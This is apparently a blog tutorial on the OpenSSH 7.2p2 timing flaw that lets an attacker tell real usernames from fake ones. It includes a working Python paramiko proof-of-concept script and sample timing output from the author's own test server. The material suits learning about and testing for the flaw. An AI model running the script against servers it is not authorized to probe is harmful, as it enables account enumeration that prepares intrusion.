So when OpenSSH checks a user’s password, it will use a hashing function like SHA256 / SHA512 to hash the password and check it against the user’s saved hashed password.

However, OpenSSH 7.2p2 and before had a vulnerability where it would use Blowfish for users that don’t exist, and SHA256 / SHA512 for real users. The two hashes compute data at different speeds, so it’s easy to tell a real one from a fake one. This bug shows some other info for it.

Info

If SELinux is enabled, OpenSSH will use the helper binary unix_chkpwd which mitigates this flaw.

Test Script

Here is a python script from this article. Setting the <SET SERVER HERE> to whatever server we want to test, we can see if the server is vulnerable:

import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.time()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
  ssh.connect('<SET SERVER HERE>', username=user,
  password=p)
except:
  endtime=time.time()
total=endtime-starttime
print(total)

Testing it

Info

This vulnerability has been corrected in all versions of OpenSSH after 7.2p2. You’ll need that version (or before) to test for what follows.

So, first let’s test a remote server of mine that I setup just for this. I change the above ‘’ to my server’s address, say ‘10.1.1.5’, and save it.

Let’s test a real user (you can also user root as the user, if it’s enabled):

user: realuser
12.5089271069

Then let’s test a fake one:

user: iambatman
2.69300603867

As you can see, 12.5 is greater than 2.6, so yes the server is vulnerable.

In other cases, this can be done on a local system.

Fake user:

nothere
0.0369758605957

Real user:

MrReal
0.0134921073914

As you can see, the times are still different, but the real one is less than the fake one. I’m guessing this is due to SHA256/512 being faster than Blowfish, and the checker not adding any wait time as it’s a local connection.